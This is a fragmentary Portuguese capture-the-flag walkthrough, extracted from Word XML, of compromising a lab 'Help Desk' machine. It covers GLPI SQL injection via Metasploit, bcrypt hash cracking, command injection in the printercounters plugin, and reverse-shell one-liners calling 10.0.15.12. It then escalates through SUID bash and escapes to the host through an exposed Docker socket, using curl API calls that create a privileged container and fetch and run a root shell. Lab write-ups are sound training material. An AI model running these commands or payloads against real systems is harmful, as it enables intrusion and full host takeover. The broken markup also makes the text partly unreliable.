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Help Desk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 vamos verificar as portas e serviços que estão ativos no ambiente.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--max-rate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172.16.1.244 4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ALL-TCP-HELPDESK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7.94SVN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https://nmap.org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2025-04-18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10:55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172.16.1.244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(0.14s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latency).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65532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(reset)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22/tcp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80/tcp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8080/tcp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http-proxy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146.62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portas e serviços previamente identificados no ambiente, prosseguimos com a verificação das versões e coleta de informações adicionais por meio do Nmap.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-p22,80,8080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172.16.1.244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Services-TCP-HELPDESK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7.94SVN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https://nmap.org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2025-04-18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172.16.1.244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(0.15s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22/tcp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9.6p1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Ubuntu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3ubuntu13.8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(Ubuntu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Linux;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ssh-hostkey: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1f:10:28:13:20:a1:8a:ab:0f:d4:56:26:bb:72:66:13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(ECDSA)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24:b5:78:c8:56:c7:d9:d3:b1:ab:8a:98:03:8b:65:62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(ED25519)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80/tcp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Apache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2.4.58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((Ubuntu))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|_http-title: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|_http-server-header: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Apache/2.4.58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(Ubuntu)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8080/tcp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Apache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2.4.62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((Debian))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http-open-proxy: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|_Methods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supported:CONNECTION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|_http-server-header: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Apache/2.4.62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(Debian)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|_http-title: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Linux;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cpe:/o:linux:linux_kernel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https://nmap.org/submit/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28.79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facilitar a resolução de nomes, adicionamos o domínio diretamente no arquivo hosts.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'172.16.1.244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helpdesk.hc'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acessarmos o serviço HTTP na porta 80, nos deparamos com a seguinte página inicial: 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67375" cy="2689916"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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68991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análise da página inicial revela que se trata de um conteúdo estático, sem funcionalidades dinâmicas aparentes. Vamos efetuar uma enumeração de arquivos e diretórios, a fim de identificar possíveis conteúdos ocultos.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/usr/share/wordlists/diretorios-web-wordlist.txt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http://helpdesk.hc/FUZZ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/'___\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/'___\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/'___\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,__\\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,__\/\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v2.1.0-dev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http://helpdesk.hc/FUZZ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/usr/share/wordlists/diretorios-web-wordlist.txt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redirects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Calibration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200-299,301,302,307,401,403,405,500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29549,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11191,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479,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670ms]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.htaccess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.hta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.htpasswd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29549,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11191,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479,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146ms]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server-status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143ms]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[89621/89621]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[1/1]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req/sec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[0:05:33]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Nenhum arquivo ou diretório acessível foi identificado que pudesse ser explorado para dar continuidade ao processo de exploração.</w:t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acessarmos o serviço HTTP na porta 8080, nos deparamos com a seguinte página inicial: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62613" cy="3475610"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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347561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acesso à aplicação requer credenciais válidas, e as tentativas com credenciais padrão não foram bem-sucedidas. Com isso, partimos para a enumeração de arquivos e diretórios ocultos em busca de possíveis vetores de acesso.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/usr/share/wordlists/diretorios-web-wordlist.txt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http://helpdesk.hc:8080/FUZZ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/'___\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/'___\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/'___\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,__\\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,__\/\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,__\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\_/\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\____/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\_\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\/___/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\/_/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v2.1.0-dev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________________________________________________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http://helpdesk.hc:8080/FUZZ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/usr/share/wordlists/diretorios-web-wordlist.txt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redirects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Calibration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200-299,301,302,307,401,403,405,500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________________________________________________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.htaccess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144ms]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.htpasswd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144ms]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.hta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10166,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3288,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3891ms]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35148,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5836,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146ms]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ajax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148ms]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10166,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3288,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189ms]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152ms]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144ms]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146ms]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plugins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10243,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3288,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204ms]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server-status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145ms]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[89621/89621]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[1/1]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req/sec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[0:05:52]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não foi possível identificar arquivos ou diretórios úteis para exploração, o próximo passo é tentar descobrir a versão da aplicação GLPI em execução.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95963" cy="1523298"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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152329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versão identificada, é possível realizar uma busca no Google em busca de vulnerabilidades conhecidas associadas ao serviço em questão. Podemos utilizar a dork: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t xml:space="preserve">glpi 10.0.17 exploit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Com retorno das buscas efetuada, chegamos no seguinte artigo.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88038"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://blog.lexfo.fr/glpi-sql-to-rce.html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Realizamos alguns testes com base no artigo de referência utilizando o Burp Suite, porém não obtivemos os mesmos resultados. Ao investigarmos no Metasploit Framework, identificamos a existência de um módulo específico para a vulnerabilidade. Após configurar os parâmetros necessários e executar o módulo, foi confirmada a vulnerabilidade no host alvo. Vamos aguardar o termino da execução.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62613" cy="2069031"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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06903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Assim que a execução bem-sucedida do exploit, foi possível obter os hashes de senha dos usuários cadastrados na aplicação.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glpi_users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api_token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Plugin_ELPI_Inventory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$2y$10$fucVSHUcQT...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glpi-system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normal</w:t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$2y$10$DzpsWVk6/E...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post-only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$2y$10$rh.xhQiCT8...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$2y$10$6XAeLVTMDw...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Auxiliary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os testes com usuários padrão da aplicação GLPI, identificamos que apenas o usuário ‘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glpi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’ estava ativo. Com isso, extraímos o hash correspondente e preparamos um arquivo para utilização no Hashcat, com o objetivo de realizar a quebra da senha.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-w=/usr/share/wordlists/rockyou.txt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hash-glpi1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--format=bcrypt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(bcrypt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[Blowfish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32/64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(iteration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Ctrl-C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PASSWORD_HERE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(?)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0:00:00:09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(2025-04-18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12:56)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0.1097g/s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37.54p/s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37.54c/s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37.54C/s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strawberry..ihateyou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"--show"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 que conseguimos realizar a quebra do hash do usuário glpi podemos efetuar a validação da credencial efetuando a autenticação na aplicação.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91188" cy="2626702"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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62670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bbbscfgy5bu4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momento podemos tentar obter uma execução de comandos remota (RCE) através do método descrito no artigo encontrado. Inicialmente efetuamos a captura da requisição da tela do plugin conforme mencionado no artigo, em seguida enviamos uma requisição utilizando o curl para validar a comunicação entre os hosts.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/plugins/printercounters/ajax/process.php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helpdesk.hc:8080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Content-Length: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X-Requested-With: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XMLHttpRequest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Accept-Language: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en-US,en;q=0.9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text/html,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*/*;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q=0.01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X-Glpi-Csrf-Token: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c95e95fc9d6159f5518f6a88f46ef36546b502314b1e3574e49c6daead58f86b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application/x-www-form-urlencoded;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Mozilla/5.0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(Windows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Win64;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AppleWebKit/537.36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(KHTML,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Gecko)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Chrome/130.0.6723.70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Safari/537.36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http://helpdesk.hc:8080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http://helpdesk.hc:8080/plugins/printercounters/front/config.form.php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Accept-Encoding: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gzip,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deflate,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Cookie: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glpi_8a3b8c36c63440d18cee792876d37eab=e6f6b2484ec4f28949ddf254d9b9c29b;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glpi_8a3b8c36c63440d18cee792876d37eab_rememberme=%5B2%2C%22F43724QsYzltjbvWG1kfuXLFbwkORayeHoOWklxW%22%5D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keep-alive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action=killProcess&amp;items_id=1231231';curl+10.0.15.12/aaaa;#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enviarmos a requisição para a porta 80, recebemos uma resposta confirmando que a comunicação com o host atacante foi bem-sucedida.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43563" cy="1303066"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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13030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 que temos a confirmação da execução de comandos remota (RCE) e comunicação com nosso host de ataque, podemos enviar um arquivo para obtermos uma conexão reversa. Para isso iremos utilizar o site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https://reverse-shell.sh/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https://github.com/lukechilds/reverse-shell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https://reverse-shell.sh/yourip:1337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2&gt;&amp;1;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socket,subprocess,os;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s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);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s.connect(("10.0.15.12",443));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os.dup2(s.fileno(),0);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os.dup2(s.fileno(),1);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os.dup2(s.fileno(),2);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p=subprocess.call(["/bin/sh","-i"]);'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2&gt;&amp;1;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Socket;$i="10.0.15.12";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh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-i");};'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2&gt;&amp;1;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/tmp/f;mkfifo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/tmp/f;cat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/tmp/f|/bin/sh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2&gt;&amp;1|nc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10.0.15.12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&gt;/tmp/f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2&gt;&amp;1;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/dev/tcp/10.0.15.12/443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arquivo de payload devidamente criado, utilizamos o Burp Suite para enviar a requisição responsável pelo download e execução do script no host alvo.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/plugins/printercounters/ajax/process.php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helpdesk.hc:8080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Content-Length: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X-Requested-With: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XMLHttpRequest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Accept-Language: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en-US,en;q=0.9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text/html,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*/*;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q=0.01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X-Glpi-Csrf-Token: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c95e95fc9d6159f5518f6a88f46ef36546b502314b1e3574e49c6daead58f86b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application/x-www-form-urlencoded;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Mozilla/5.0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(Windows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Win64;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x64)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AppleWebKit/537.36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(KHTML,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Gecko)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Chrome/130.0.6723.70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Safari/537.36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http://helpdesk.hc:8080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http://helpdesk.hc:8080/plugins/printercounters/front/config.form.php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Accept-Encoding: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gzip,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deflate,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Cookie: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glpi_8a3b8c36c63440d18cee792876d37eab=e6f6b2484ec4f28949ddf254d9b9c29b;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glpi_8a3b8c36c63440d18cee792876d37eab_rememberme=%5B2%2C%22F43724QsYzltjbvWG1kfuXLFbwkORayeHoOWklxW%22%5D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keep-alive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action=killProcess&amp;items_id=1231231';curl+10.0.15.12/shell|bash;#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Assim que executamos a requisição obtemos a conexão reversa com o ambiente.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8338" cy="2164839"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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16483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OBS: Para conexão reversa utilizamos o script Penelope.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https://github.com/brightio/penelope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acesso interativo no host podemos ir em busca da nossa primeira evidência que está localizada dentro da raiz (/) do sistema.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7863" cy="3580209"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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358020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Efetuado algumas analises de forma manual identificamos que estamos dentro de container(docker).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wd5u7hf0ixq7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dar continuidade ao processo de exploração, é necessário realizar a escalada de privilégios e obter acesso como usuário root. Somente com privilégios elevados será possível, posteriormente, realizar o escape do ambiente Docker para o host. Para isso vamos utilizar a ferramenta CDK.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hyperlink r:id="rId20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https://github.com/cdk-team/CDK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http://10.0.15.12/cdk_linux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--2025-04-18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17:01:53--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http://10.0.15.12/cdk_linux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10.0.15.12:80...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10395800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(9.9M)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[application/octet-stream]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'cdk_linux'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cdk_linux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100%[===================&gt;]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9.91M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50.6KB/s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2025-04-18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17:04:29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(65.4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KB/s)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'cdk_linux'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[10395800/10395800]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transferência da ferramenta fornecemos permissão de execução e aguardamos a conclusão da enumeração. Terminado a enumeração identificamos que o binário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/usr/bin/bash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com permissões SUID atribuídas, a qual nos permite obter acesso de root no container.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8338" cy="3537438"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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5374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Vamos executar o binário utilizando o parâmetro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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p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827042"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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270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acesso root obtido, executamos novamente a ferramenta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CDK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objetivo de identificar possíveis vetores de interação direta com o host Docker. Ao final da execução, um ponto de destaque foi a identificação de que o socket do Docker estava montado dentro do container como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/docker.sock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a possibilidade de comunicação direta com o daemon do Docker no host.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8725" cy="1257300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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Isso significa que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 container tem acesso direto ao Docker daemon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host.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o processo dentro do container conseguir interagir com esse socket (via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ou similar), ele pode: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Listar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criar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executar containers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Montar o sistema de arquivos do host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Executar comandos no host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Obter root no host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dessa descoberta, identificamos que é possível listar os containers existentes, com o objetivo de, posteriormente, criar um novo container que nos permita executar comandos diretamente no host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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hyperlink r:id="rId24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https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket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--unix-socket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/var/run/docker.sock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http://localhost/containers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[{"Id":"fe36747c56c296e6ccfe1b31f48ef8cb1ee5fb4a998b715ceaceb3a1eaf7246b","Names":["/glpi"],"Image":"glpi_glpi","ImageID":"sha256:bbd48bef44ae6a74f4280f81297ef820435cada5b91c3f76b84ccf24082c4a89","Command":"docker-php-entrypoint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ache2-foreground","Created":1744213622,"Ports":[{"IP":"0.0.0.0","PrivatePort":80,"PublicPort":8080,"Type":"tcp"},{"IP":"::","PrivatePort":80,"PublicPort":8080,"Type":"tcp"}],"Labels":{"com.docker.compose.config-hash":"55ba5d4e98d0a66164d8bec3ab268e00b776e652e9f93f99d9cd5d51ac6e3f7d","com.docker.compose.container-number":"1","com.docker.compose.oneoff":"False","com.docker.compose.project":"glpi","com.docker.compose.project.config_files":"docker-compose.yml","com.docker.compose.project.working_dir":"/opt/glpi","com.docker.compose.service":"glpi","com.docker.compose.version":"1.29.2"},"State":"running","Status":"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","HostConfig":{"NetworkMode":"glpi_default"},"NetworkSettings":{"Networks":{"glpi_default":{"IPAMConfig":null,"Links":null,"Aliases":null,"MacAddress":"02:42:ac:1b:00:03","NetworkID":"393ee402e86f05b5faf5a76c9d59f2724519c21b8509c18041f684211b5102df","EndpointID":"aa82f2a0e2133738d771b2b6270ee416c7ce9e2a1b77e5f17124c41cdfbac783","Gateway":"172.27.0.1","IPAddress":"172.27.0.3","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"DriverOpts":null,"DNSNames":null}}},"Mounts":[{"Type":"bind","Source":"/opt/glpi/flag.txt","Destination":"/flag.txt","Mode":"rw","RW":true,"Propagation":"rprivate"},{"Type":"bind","Source":"/var/run/docker.sock","Destination":"/var/run/docker.sock","Mode":"rw","RW":true,"Propagation":"rprivate"},{"Type":"volume","Name":"glpi_glpi_data","Source":"/var/lib/docker/volumes/glpi_glpi_data/_data","Destination":"/var/www/html","Driver":"local","Mode":"rw","RW":true,"Propagation":""},{"Type":"bind","Source":"/opt/glpi/plugins","Destination":"/var/www/html/plugins","Mode":"rw","RW":true,"Propagation":"rprivate"}]},{"Id":"2c7757021d33cd2de80034abcf0744062142f5edc4f24bb9644d53a113c7bc55","Names":["/glpi_db"],"Image":"mysql:5.7","ImageID":"sha256:5107333e08a87b836d48ff7528b1e84b9c86781cc9f1748bbc1b8c42a870d933","Command":"docker-entrypoint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qld","Created":1744213622,"Ports":[{"PrivatePort":33060,"Type":"tcp"},{"PrivatePort":3306,"Type":"tcp"}],"Labels":{"com.docker.compose.config-hash":"c08ce330e46d3591f2b87c2db85359dad9ade7943f279ea82e71057325dd5f87","com.docker.compose.container-number":"1","com.docker.compose.oneoff":"False","com.docker.compose.project":"glpi","com.docker.compose.project.config_files":"docker-compose.yml","com.docker.compose.project.working_dir":"/opt/glpi","com.docker.compose.service":"db","com.docker.compose.version":"1.29.2"},"State":"running","Status":"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","HostConfig":{"NetworkMode":"glpi_default"},"NetworkSettings":{"Networks":{"glpi_default":{"IPAMConfig":null,"Links":null,"Aliases":null,"MacAddress":"02:42:ac:1b:00:02","NetworkID":"393ee402e86f05b5faf5a76c9d59f2724519c21b8509c18041f684211b5102df","EndpointID":"c219c93e4125a77007052e8a0f11eca54b455193265f2fa480d7ce9dabf832ec","Gateway":"172.27.0.1","IPAddress":"172.27.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"DriverOpts":null,"DNSNames":null}}},"Mounts":[{"Type":"volume","Name":"glpi_db_data","Source":"/var/lib/docker/volumes/glpi_db_data/_data","Destination":"/var/lib/mysql","Driver":"local","Mode":"rw","RW":true,"Propagation":""}]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executarmos o comando via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listar os containers, identificamos a imagem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t xml:space="preserve">glpi_glpi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já estava presente no ambiente e possuía as dependências necessárias para execução. Por esse motivo, optamos por utilizá-la na criação de um novo container privilegiado.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imagem identificada, criamos um novo container em modo privilegiado com o diretório raiz do host montado em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24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/mnt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isso, utilizamos uma requisição via curl diretamente no socket Docker exposto, conforme o exemplo abaixo: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--unix-socket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/run/docker.sock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http://localhost/containers/create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"Image":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"glpi_glpi",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"Tty":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"OpenStdin":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"HostConfig":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"Privileged":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"Binds":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["/:/mnt"]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{"Id":"8be5a97c4db9c4cb07f38f7f071411c2267102d0bf99e3e41f5984657a5b44e0","Warnings":[]}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configuração permite que o container tenha acesso total ao sistema de arquivos do host, viabilizando a leitura, modificação e execução de arquivos fora do ambiente isolado do Docker. Agora será necessário iniciarmos o container criado.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--unix-socket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/run/docker.sock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http://localhost/containers/8be5a97c4db9c4cb07f38f7f071411c2267102d0bf99e3e41f5984657a5b44e0/start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iniciar o novo container com o sistema de arquivos do host montado em /mnt, o próximo passo será transferir a reverse shell para o host. Para isso, utilizamos o Docker Socket para criar uma sessão exec dentro do container com o seguinte comando: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--unix-socket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/run/docker.sock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http://localhost/containers/8be5a97c4db9c4cb07f38f7f071411c2267102d0bf99e3e41f5984657a5b44e0/exec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"AttachStdout":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"AttachStderr":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"Tty":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"Cmd":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["curl",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"-o",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"/tmp/shell-root",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"http://10.0.15.12/shell-root"]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{"Id":"b3694fd27042e6cbdfa2f94abb24159dd7a4a868ba2f898fa06057851ea71f8e"}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comando instrui o container a fazer o download da payload (shell reversa) hospedada em nosso servidor controlado. Com a sessão exec criada, é necessário efetuarmos a execução.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--unix-socket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/run/docker.sock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http://localhost/exec/b3694fd27042e6cbdfa2f94abb24159dd7a4a868ba2f898fa06057851ea71f8e/start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'{"Detach":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"Tty":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vamos criar uma nova sessão exec para que possamos aplicar permissão de execução no arquivo de shell baixada.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--unix-socket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/run/docker.sock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http://localhost/containers/8be5a97c4db9c4cb07f38f7f071411c2267102d0bf99e3e41f5984657a5b44e0/exec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"AttachStdout":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"AttachStderr":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"Tty":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"Cmd":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["chmod",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"+x",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"/tmp/shell-root"]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{"Id":"922489bfbe9237f61a35793a55045a95808d964045db2a1caccd4f73bd4d4dff"}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mais uma vez, iniciamos a sessão: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--unix-socket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/run/docker.sock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http://localhost/exec/922489bfbe9237f61a35793a55045a95808d964045db2a1caccd4f73bd4d4dff/start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'{"Detach":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"Tty":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arquivo de shell pronta para ser executado, criamos uma última sessão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exec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executar o payload dentro do container (que possui o vínculo para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/mnt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host).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--unix-socket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/run/docker.sock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http://localhost/containers/8be5a97c4db9c4cb07f38f7f071411c2267102d0bf99e3e41f5984657a5b44e0/exec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"AttachStdout":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"AttachStderr":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"Tty":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"Cmd":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["bash",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"/tmp/shell-root"]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{"Id":"a7a419283dea9ad924c42e67376ae6e0ba9d47aea97442256b3607133ee0f7fe"}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 vamos executar para obtermos nossa conexão reversa.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--unix-socket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/run/docker.sock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http://localhost/exec/a7a419283dea9ad924c42e67376ae6e0ba9d47aea97442256b3607133ee0f7fe/start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'{"Detach":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"Tty":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Assim que executado obtemos acesso reverso como root no container criado.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2138" cy="1790723"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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179072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do acesso root no container, conseguimos navegar até o diretório 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/mnt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corresponde à raiz do host, permitindo interação direta com o sistema principal. Assim conseguimos obter nossa última evidência dentro do diretório</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="eb5757"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /mnt/root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4013" cy="2264172"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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26417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headerReference r:id="rId29" w:type="even"/>
      <w:footerReference r:id="rId30" w:type="default"/>
      <w:footerReference r:id="rId31" w:type="first"/>
      <w:footerReference r:id="rId32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C">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qnw61nncct6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9D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E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Help Desk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cdk-team/CDK" TargetMode="External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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket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9.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.pn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app.hackingclub.com/laboratory/competition-machines/266" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3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1.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.lexfo.fr/glpi-sql-to-rce.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://reverse-shell.sh/" TargetMode="External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hyperlink" Target="https://reverse-shell.sh/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/brightio/penelo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